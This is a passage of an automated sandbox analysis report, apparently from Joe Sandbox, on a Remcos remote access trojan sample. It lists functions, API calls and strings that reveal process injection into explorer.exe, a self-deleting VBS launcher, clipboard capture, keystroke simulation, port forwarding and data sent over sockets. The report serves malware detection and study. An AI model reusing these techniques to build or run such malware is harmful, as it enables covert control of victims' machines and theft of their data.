
_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

Temp, xrefs: 0040D89A
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967
8SG, xrefs: 0040D80F
open, xrefs: 0040D9B2
.vbs, xrefs: 0040D85F
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9
exepath, xrefs: 0040D831
""", 0, xrefs: 0040D8E1

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-3159800282
Opcode ID: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 8540ee6109fc5d5e06acd7d4b9875de3834636e3193428be82b889be829a6c91
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Uniqueness

Uniqueness Score: -1.00%

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Uniqueness

Uniqueness Score: -1.00%

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32(?), ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

GetMessage, xrefs: 004055F8
DisplayMessage, xrefs: 004055EC
CloseChat, xrefs: 00405609

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Uniqueness

Uniqueness Score: -1.00%

Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
GetFileSize.KERNEL32(?,00000000), ref: 00413432
UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
CloseHandle.KERNEL32(00000000), ref: 0041345F
CloseHandle.KERNEL32(?), ref: 00413465

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E

Uniqueness

Uniqueness Score: -1.00%

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Uniqueness

Uniqueness Score: -1.00%

Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(?), ref: 004115AF

Strings

GetDirectListeningPort, xrefs: 004116B2
NG, xrefs: 0041153A
StopForward, xrefs: 00411690
StopReverse, xrefs: 004116A1
StartReverse, xrefs: 0041167F
StartForward, xrefs: 00411673

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: a7bd2cf574d9c29f0f452118638ed50856907e78b238ba203f6b8faaf9cf41f8
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Uniqueness

Uniqueness Score: -1.00%

Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
__fassign.LIBCMT ref: 0044B479
__fassign.LIBCMT ref: 0044B494
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512

Strings

PkGNG, xrefs: 0044B3BE

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID: PkGNG
API String ID: 1324828854-263838557
Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

temp, xrefs: 004174A5
/t , xrefs: 004174D4
open, xrefs: 004174EF
\sysinfo.txt, xrefs: 004174A0
dxdiag, xrefs: 004174EA

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Uniqueness

Uniqueness Score: -1.00%

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe), ref: 0040749E

Strings

\explorer.exe, xrefs: 00407400
[+] NtAllocateVirtualMemory Success, xrefs: 00407410
windir, xrefs: 004073EA
PEB: %x, xrefs: 004074AF
explorer.exe, xrefs: 00407450, 0040747B
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32(?), ref: 0041D4F3
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

_memcmp.LIBVCRUNTIME ref: 00445423
_free.LIBCMT ref: 00445494
_free.LIBCMT ref: 004454AD
_free.LIBCMT ref: 004454DF
_free.LIBCMT ref: 004454E8
_free.LIBCMT ref: 004454F4

Strings

C, xrefs: 004452E1

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 00414A46
tcp, xrefs: 00414A73

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

NG, xrefs: 00401990
XMG, xrefs: 00401902
PkG, xrefs: 00401888
NG, xrefs: 0040190D

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1649129571-3151166067
Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Uniqueness

Uniqueness Score: -1.00%

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97

Uniqueness

Uniqueness Score: -1.00%

Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00447679
__freea.LIBCMT ref: 00447723
__freea.LIBCMT ref: 00447741

Part of subcall function 00435E40: _free.LIBCMT ref: 00435E56

Strings

zD, xrefs: 004479AB
am/pm, xrefs: 004477A4
a/p, xrefs: 00447808

Memory Dump Source

Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_csc.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm$zD
API String ID: 2936374016-2723203690
Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B

Strings

